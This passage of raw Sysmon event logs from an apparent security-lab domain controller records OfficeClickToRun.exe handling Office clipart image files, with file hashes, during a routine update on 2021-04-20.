Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099190.JPGMD5=409A2534F17BC2267E2BB81462845B75,SHA256=972AECCED97B2BE87950E0E2D5F53CEB2B052E9C0FEB5EC9514277E9B6BA53F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099189.JPGMD5=8EB61C9779A7847AA75D1C966A46DCDB,SHA256=08A82BCE8618EE162135623EAD1B17437136AD10C994FDEB4C72884582B14B9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099188.JPGMD5=FF028051D2BA65344280F2422A76599A,SHA256=A97EBF9BDAB755E700A14347BBB9641C0BCF4DF7EE63D0889D45C3FD6A6D45D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099187.JPGMD5=E46A4BEE53AD6465BD1506A904C1DAB7,SHA256=AED37F8BB12227D1E0FAE9C618EE96000735CC16B61F12501C84CCBF48ABB837,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099186.JPGMD5=7B1E142606D2F760DDA1B39FEAEF2ED0,SHA256=162836DF23EB6C625AFD0C56C9EB9BE5D98D86007C88A925C6C0759E6E9848C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099185.JPGMD5=60320A32433143F246B8410C1A15AA3A,SHA256=83791007407BF45170C67562A8978A3319BB8CDE5B0854976528280AFFA51D3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099184.WMFMD5=A2701C3BC3E56606198B56BDBBD8537D,SHA256=6FCA1E4A75EC886D3EE638901B0BD96D41B6C882613DA617A5D7B963D982BA67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099183.WMFMD5=63CBD573E7A58AB44A9EC343CF831844,SHA256=6FB8959FCAF8B5ED2E75A367E318C44EFC44EF678614ED100E0DDA7A42A3EBC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099182.WMFMD5=10DEE097815F8E78AD0F399AB26F7936,SHA256=6E35C3D5AE9FB62126205E6349409584B06BC4631B47FC2B901D2DAC7ECC088D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099181.WMFMD5=394EEF03D573B19F1EE02D42DF750BFA,SHA256=A8521B2C132087BF2B36E7622CFDC3016B0D7ECE70B39E1730668BE9BBB304F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099180.WMFMD5=E6A29AF5A3EDA51430AC45AF3F9CADE0,SHA256=32599425F0ABA4FC1BCC2E1E7477A309F6DC31E4758915B4CBF4E0D689872B43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099179.WMFMD5=6CB813931D26AE3C7184A7CC6EFC1E29,SHA256=A0E40A54C341A59662CF0F69D20DCAD4F394740F41E41C260C2D1ADE088DB3C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099178.WMFMD5=42587AF8C91703B78737D9984732D735,SHA256=94E6A10842A0B843C6FBBE82CD3998F100BBFD5D47870BA810EDE58FBF454CAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099177.WMFMD5=94CE3E7EAE955D9B6D1937A9A60FE243,SHA256=5B676C7CF7A653C558DA75DED8A7C0EC92E7A0DE3B1391FB5EB3D6AA9311AF78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099176.WMFMD5=4ED9B0B1C4081446BC2E336F2C071FA9,SHA256=13F5BD3D4E67AF3AD2B3D0A5C48B19184CB6B3BA6EEC26D50C1098C8E1FDE65A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099175.WMFMD5=5556FB1FA133C42A561CECF9AFFE72F4,SHA256=B38F33B5955F92791FF99F283716019BC7CB140C7F188948F5F410B13DD3BCDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099174.WMFMD5=5A87197750FC417EDC55FF08A338A8E0,SHA256=15A5E8B580551836AB2536F668E794F91ECE0D25562AA298F1C4A548E01B6180,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099173.WMFMD5=DC2E00276B20DD5AEEDA69F96094A1AA,SHA256=7A4C95B1AB90EF60B607E724FF5B1E0592812A1D363FEEC122057C0D943D205E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099172.WMFMD5=028FCE456E9D9F603DD988A44A2CAE57,SHA256=33F61F1287562E6ADBBC58D529AE350BB318031517F53EB5FDB7058A04923796,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099171.WMFMD5=6DA040777F26F86178866D9F8A04DFAC,SHA256=661FA26D620E33F9EA0355A127B73CC3AAB7F9DFEE65BE8499A47CBE0890AB9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099170.WMFMD5=800DACAA5B96513ED840BAEBB748C724,SHA256=D05060B0E7B5091EA2FF75CCA1BBF8CDE0D2DBED783DA875AE0DC4B0698E5D4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099169.WMFMD5=190C4BB5BEC915371D2DE705A6B54B25,SHA256=A1B63CB432A5D447C8F33084536851366E7A424C218E4AB93F07DE09E417D6FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099168.JPGMD5=731683311B5BE2DB024601B2E185AA49,SHA256=382667AC11D48A880A63EECD7359EFFAA8DC9DDA204BFCF33AB07EDE7411D3C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099167.JPGMD5=8C462AFB795E218F3CD5984E04FE2F04,SHA256=26BCB572BF8CE82DCCFA90F652FC44693BADF90C3A8E6409339C95E650611287,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099166.JPGMD5=80DA28EDC3C53FB5B3CEA4D5F0F14E93,SHA256=D41158A4F1378D071AAFF971017B61DF30056BFE90D9D991124D00EA7513CE2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099165.JPGMD5=534728CA45061701D6786F42AD1E8557,SHA256=873087D980676039D8D2F2DE58F1D202CC868E451631AE795365E145421F1346,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099164.WMFMD5=2E9DBA38B0A7837A009EC7D3F62B0537,SHA256=F739055B643E1E83F16734FF468009631BC49D46251733788AAE03B05E34FB2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099163.WMFMD5=F477BF1C3752851BF16600B5437318DA,SHA256=7549BD73B5178EB65F12F09D5CDEFBFF81FD07148E5708B8583D30CBF42F06CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099162.JPGMD5=352AF77E708AB53E79A1E4D0B68BDB52,SHA256=16AA85AA36E37F8A4C407D620147C0E6D7A8252BF5FF5A9E9EB9EF4E13B8FB15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099161.JPGMD5=8B1F2F4F69D6D8B5728EA8A9F31665CA,SHA256=BCE8EA0BC7AF4787D225B8FBEB2EC5690C066551D89D9C1317BFC34760CB83D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099160.JPGMD5=1D0FEA5B3CC0BB000226C193C2C18D30,SHA256=5E8F287D26238B1C2F9D50FA3CD202C3D788A4CFAB75E940975114336023D900,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099159.WMFMD5=A43CE59ED98F2D159924474F463DD585,SHA256=3F4F074C488EEC5A2D968BB3A46B302253BD4B3C0D684CDC43B5B23ECFD5AD12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099158.WMFMD5=54419003F779F6D274AB6083923F019F,SHA256=B8DEDC3CAA967D8730AF09FA1DA29AFF4D50808E819573E8364C80D78B1A93C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099157.JPGMD5=7EC27E52E31BA37833DD01562580A837,SHA256=D689CA774A7DDE6BA8FEA6B976AD08641DAF0BD0330B6447F56ED2277DE27B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099156.JPGMD5=F21650ED969A963BC76340E158DE559B,SHA256=B71C1BA71D3C05B166D4EA401FE51CA3D84841C9AC328B945B832DCCCF527937,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099155.JPGMD5=6BA77CCF7D4CD3D2F6979C93A0DAAF90,SHA256=3BC7600F462B823BE4025C6352A7EF889286915D591522959B18F7CF6868B5C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099154.JPGMD5=F4481858D5B6433EE85383CC89429398,SHA256=7409DA6BC5A71B1A05BFA8B435E466814A443F25E452AC44CBDC2295B52D5280,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099153.WMFMD5=574360E3FB73BF13DFC8F66599911111,SHA256=CC742259761A2BCE5B1B1A1C005E817B06696F2EB15D6BB8FDC4B17129CD6BFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099152.JPGMD5=B350D7E37BFE3D050D6FE82C9430C1EC,SHA256=BE9E344744341C4AFB624CB9119E958F62C813648E61A4614C06B6BB1F1CD8DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099151.WMFMD5=E48FE6ECEEEF045DB564CAFD007A0376,SHA256=2B0F5B140C4FB9BD376047FAA0A0C4EE227AF1875C4C2385F62570D806E9F8FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099150.JPGMD5=12BA6ECBB5EDA27C94FAA20B1264927A,SHA256=54A4B1E50E6FF5B5A3CEAA9D7AC5C54172C8CF63B114A9A9AF198D9D99445E0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099149.WMFMD5=3971729E3C05C37367CD2A18B43BDA3F,SHA256=AE204FBB46B3184DB3E040761686EBB149C5D6F78C257C048851671F868B9F35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099148.JPGMD5=8CA2B8EC2ABA0864325E9FE22732E4CA,SHA256=C0A8772CD037CAB574324125F1EE7D22269937DD4B5ADE852186135A97FD4E4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099147.JPGMD5=291217B4D93FC85AB48D7440ACD4037B,SHA256=6CCFBC8550A7C939EED2DDD38C5B3F92B5BEA0888A82F068CB75B9F744D89600,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099146.WMFMD5=52C9CF5262714C9BE4857652F0531650,SHA256=3F2A003967E01496CA292330E9C3AD1833B1EA8D5665ACDA9FD74A04DDEAC964,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 